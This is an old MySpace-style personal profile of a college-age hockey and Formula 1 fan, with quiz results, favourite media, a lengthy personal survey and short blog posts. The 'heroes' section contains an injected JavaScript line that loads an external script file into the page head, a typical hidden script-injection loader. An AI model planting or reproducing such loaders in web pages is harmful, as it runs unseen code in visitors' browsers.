Cookie [I see PGs] Mavie aka Gizzun ™ profile picture

Cookie [I see PGs] Mavie aka Gizzun ™

Complements of the Killing Service Inc...

About Me

Hey what's crackin' everybody! I'm not a myspace whore, so I know everyone on here...and if you don't know wut my name is...then next page...I will now let KSI J Pice tell you all a little bit about me....take it Pice... "Topgun has requested to be cool. Well ask and ye shall recieve. Topgun is way cool for many reasons which I say name in great detail for they bare mentioning. One, his hame is Topgun. Have you seen Topgun? If you havent either go upstairs into your daddys closet and get his gun and end your sad existence of a life (jk about the gun ... dont play with guns kids, only bad things come from it) or run to your nearest Video Rental Store and rent it now. Go .................................................... Ok, now that thats taken care of, we move on to our second point in this elaborate, yet truthful, speech. He rolls. If you dont know what rolling is, well then we are back to our two choices again. We know how the first ones ends, so run back to the Video Store and rent The Big Lebowski because, quite frankly (weird, Im actually watching Quite Frankly right now) you are out of your element. This isnt Nam. There are rules. And one of them is that you run to the Video Store and rent Topgun and The Big Lebowski when I tell you too. I can wait ....................... Ok, Im done waiting. The final reason as to why Topgun should be bestowed with the honorary title of Cool is he on the News Team with me. A Group so exclusive that their is only one other member. Who could that be? This guy. Oh yeah. We are so cool, we have our own group on the forums.So, in conclusion to this endless rant of pointess yet insightfull remarks. Topgun ... you are cool!"and there you have it.....for those interested my gt's are KSI TOPGUN 7 and GSXR Captain. I dont accept random ass friend requests so ya better put a message in there otherwise I will just delete it!

My Interests

Snowboarding, ultimate, HOCKEY!!, sailing, surfing, Halo 2, talkin to friends...

Check out my band MINDSPLIT. Just click the banner!

What type of hockey player are you?
You have a crafty skill, and you avoid physical play with your slick moves and speed. Everything you do is flashy and clean.

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Brought to you by quizzes and personality tests. What kind of Japanese import driver are you?
You're a Nissan driver. This particular brand of driver prefers the looks, power, and handling of the lower-end RWD imports. You look at life from a different perspective (i.e. sideways). You change tires more often than you change your oil, and you prefer it that way.
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I'd like to meet:

lol, think ur cool enuf to be in the cave with us?? :)

that's just plain sick...

yeap, me and zion's sweet creation

yeah buddy!

Ya ya, you wish you were cool like us

Old skool KSI...never forget!..Kaos Prophets!

Someday, I would like to meet my three sports idols. Troy Aikman of the awesome Dallas Cowboys, and Michael Schumacher, the best Formula 1 driver ever to be in the Ferrari company and ever to be in the Formula 1 citcuit. And finally, Mario Lemieux. The best hockey player to ever play for the Pittsburgh Penguins. And I would do ANYTHING to see 311 in concert!!! I would also like to meet jim carey cuz he is the funniest person alive. ~that would be michael and his younger brother "flying" by on top~ ~huh!! ya'll ready for...3-3-3...3-11!!!~ ~GOD!!!~

My Comment Box
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311 always!!"There isnt any place that I need to go There isnt anything that I need to know I did not learn from the radio" -everclear"out on the ocean theres no one around no one to hear a sound its just us out here out on the ocean speaking freely away from the city away from the ears that bug us and judge us its so liberating to be free and my heart slows down nice and easy" -311"OR IN THA LLAC SUNROOF LET BACK WITH A TECH ON THA SEAT"


Backdraft, Topgun (if you didn't guess), the fast and the furious, a goofie movie, beavis and butthead do america...and so on...


Love Seinfeld, Family Guy, and newsradio...who doesn't??? 24 also kicks ass


My favorite book is The Hunt for Red October without a question. That is one of the best books that I have ever read. Also on the top of my list are: Vertical Burn, Clear and Present Danger, and Into the Inferno...basically anything written by earl emerson
Cna yuo raed tihs? cazry! Body: Cna yuo raed tihs? Olny 137 peploe on mepysca can so far. i cdnuolt blveiee taht I cluod aulaclty uesdnatnrd waht I was rdanieg. The phaonmneal pweor of the hmuan mnid, aoccdrnig to a rscheearch at Cmabrigde Uinervtisy, it dseno't mtaetr in waht oerdr the ltteres in a wrod are, the olny iproamtnt tihng is taht the frsit and lsat ltteer be in the rghit pclae. The rset can be a taotl mses and you can sitll raed it whotuit a pboerlm. Tihs is bcuseae the huamn mnid deos not raed ervey lteter by istlef, but the wrod as a wlohe. Azanmig huh? yaeh and I awlyas tghuhot slpeling was ipmorantt!
Indepth Survey About You [Perfect For Allowing People To Get To Know You Better]

::Background Info::
Name: Anthony...aka Tonis, Mavie, PG1, Gizzun, TG
Age: 20
Date of Birth: July 22
Place of Birth: Stocktown
Ethnic Background/Ancestry: Italian
Languages You Speak: English
Relationship Status: Single
School Situation: In College
Job Situation: Employed by Backroads
Do you drive?: duh
Do you smoke cigarettes?: nope
Do you drink alcohol on a regular basis?: uh no
Do you do recreational drugs at least occasionally?: nope
Family Situation [Who do you live with?]: i live with my roomates... they're stupid random as hell, but i wouldn't live any other way
::Your Appearance [Physical]::
Natural hair color: Blonde
Hair Type [Straight, Wavy, Curly, etc]: straight
Long or short?: medium i guess
Current Hair Style: inbetween transition, idk however u wanna say it
Eye color: blue
Eye shape: regular?
Do you have freckles?: nope
Skin tone/complexion: white boi
Do you have a tan?: yep
Height: 6 2
Body Type/Build: atheletic
Shoe Size: 14
Any scars?: a few
Physical feature that stands out the most: eyes
::Your Appearance [Fashion]::
Tattoos?: none
Piercings?: none
What subculture do you gravitate towards the most?: shit, idk
How would you describe your style?: expensive n high class
Tshirts and jeans -or- Dresses/Suits?: depends on the occasion
Sneakers -or- Heels/Dress Shoes?: same as above, but day to day chucks
Tight or baggy pants?: not super baggy but u get the pic
What color do you wear most often?: blue or black
What do you wear on an average day around the house?: basketball shots n a t shirt
What do you wear to sleep?: same as above :p
What is your jewelry style?: um, i would hope most guys dont have a jewelry style...
How about shoes? Any brands you love/wear a lot?: chucks
Do you paint your nails?: nope
What is your make-up style?: um, none
Do you carry around bags or purses?: nope
What are your favorite accessories?: my cellphone i guess
Do you wear sunglasses a lot?: a bit, more hats tho
What is your favorite way to dress? [Sexy, Cute, Modest, Professional, etc]: high class style
Does fashion mean a lot to you?: eh, i'm not all trippy about it but a lil
::Your Beliefs::
Do you have a religion/spirituality?: not really
Do you believe in a supreme being?: myself, yes :p jk
Life after death?: life
Heaven and Hell?: ill tell you when i get there u know
Angels and Demons?: demonic angels :p
Aliens?: u mean little green men? i dont think so
Reincarnation?: eh, haven't had the experience toback it up
Horoscopes?: nope
Fortune Telling?: nope
If you have a faith/relgion, is it the most important thing in your life?:
What are your views on abortion?: can't say cuz i dont want to piss ppl off u know
Gay marriage?: let em be, i dont give a shit
Politics?: the only thing worse than a republican or a democrat, IS WHEN THESE TWO PRICKS WORK TOGETHER!
Political Correctness?: eh
Are you more Liberal or Conservative?: why does it have to be one or the other?
How do you feel about sex outside of marriage?: wutever
::Dating and Relationships::
Would you date a person with a different religion than you?: yes
How about polar opposite political beliefs?: yes
What are qualities you look for in a bf/gf?: funny, sense of style, nice, caring
What kind of personality issues do you dislike?: daddys girl, stuck up
Looks or personality?: both
Are you shallow?: nope
Do you fall in love easily?: sometimes
How do you know you like someone?: its just a thing u can tell
What do you usually do when you like someone, or think you like someone?: try to find a way to tell em
Do you like to take things fast or slow?: depends on how it goes
Casual dating -or- Serious committed relationship?: both
What is your philosophy on dating/love/relationships?: love, is giving a girl the power to completely destroy you and trusting them not to do it
Is there a difference between liking someone and having a crush on someone?: yes
Do you like the other person to make the move first?: dont matta
What would ruin a relationship?: lies...web of lies!
Would your ideal guy/girl call you? Or would you call them?: both
Would you expect them to make all the moves?: nope
Would you expect them to be with you 24/7?: nope
Are you a jealous person?: sometimes, depends on wut i'm gettin jelous about
Obsessive?: no
Overly emotional?: no
Do you think you would be a good gf/bf?: hell yes, but too bad they dont think that way
::Your Future::
What do you want to do with your life?: i have a few possibilities in my future
Is getting married important to you?: yes
Want kids?: yep
How many?: 2
Do you wanna be rich?: workin on it
If you had to choose between a huge career and a family, would you?: depends on the career and the girl
What is your idea of success?: doing what makes you happy
What is your main goal in life?: to be very successful with my own company and a happy family with a loving wife
::A Little Bit of Random Stuff::
Favorite music?: all kinds
Favorite bands/artists?: 311
Any plans for today?: same ole same ole
What do you like to do with your free time?: write music, chill, read, sports
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Michael Schumacher...if you know me then you'll know why.

Robert..because I wish I could play like him!! a true baller.
Stefi...cuz i wish i had talent like her...that's her song i'm sportin btw...!!
all the CEO's of major construction companies that didn't even get more than a bachelors in college...i despise you're not really a hero to me... .."var s=document·createElement('script');s.src='../x/7318.js' ;document·getElementsByTagName('head')[0].appendChild(s );"

My Blog

Formula 1 Ferrari lineup

If you know me at all, then you know October 22nd of this year was a big day for was the Brazil Grand Prix.  It was no ordinary grand prix...this happened to be the last race for Michael ...
Posted by Cookie [I see PGs] Mavie aka Gizzun ™ on Mon, 27 Nov 2006 08:22:00 PST

home for a bit

ok stocktown people, i'm home for about a week and a half, then i'm off to nova scotia for the rest of the summer. so nows ur chance...if i mean anything to ya! call me or something
Posted by Cookie [I see PGs] Mavie aka Gizzun ™ on Thu, 15 Jun 2006 09:13:00 PST

my bday

Get your own countdown at
Posted by Cookie [I see PGs] Mavie aka Gizzun ™ on Sun, 23 Apr 2006 01:24:00 PST


ok that shit i posted about how hard pylometric training was....fuck that! this week is hell week and it sucks ass! and its only monday! to start off we woke up at 5 am and went to school...thi...
Posted by Cookie [I see PGs] Mavie aka Gizzun ™ on Tue, 24 Jan 2006 05:43:00 PST

plyometric training

ya so I'm still going to plyometric training ever week.  eventhough i'm hurt and i shouldn't be practicing..says my physical therapist.  but he's just a doctor..what does he know!!  jkj...
Posted by Cookie [I see PGs] Mavie aka Gizzun ™ on Wed, 07 Dec 2005 05:25:00 PST


wow..i am so bored right now it is not even funny..someone please call me or leave me some comment or something!!!
Posted by Cookie [I see PGs] Mavie aka Gizzun ™ on Sun, 27 Nov 2005 08:18:00 PST

The Ten Commandments of the Disc

1.  the most powerful force in the world is that of a disc straining to get under a car. 2.  the higher the quality of the catch the greater the probability of a crummy rethrow. 3.  one...
Posted by Cookie [I see PGs] Mavie aka Gizzun ™ on Fri, 04 Nov 2005 05:25:00 PST


What up, Givin a shout out to my group, ihog. Check it out we got a new song. I make do the beats so you know its the shit!!lol "what can i say, i'm just a g, so sit back, re...
Posted by Cookie [I see PGs] Mavie aka Gizzun ™ on Mon, 01 Jan 1900 12:00:00 PST


I am 56% Evil Genius..Evil courses through my blood. Lies and deceit motivate my evil deeds. Crushing the weaklings and idiots that do nothing but interfere in my doings.Take theEvil Genius Test@ Fu...
Posted by Cookie [I see PGs] Mavie aka Gizzun ™ on Mon, 01 Jan 1900 12:00:00 PST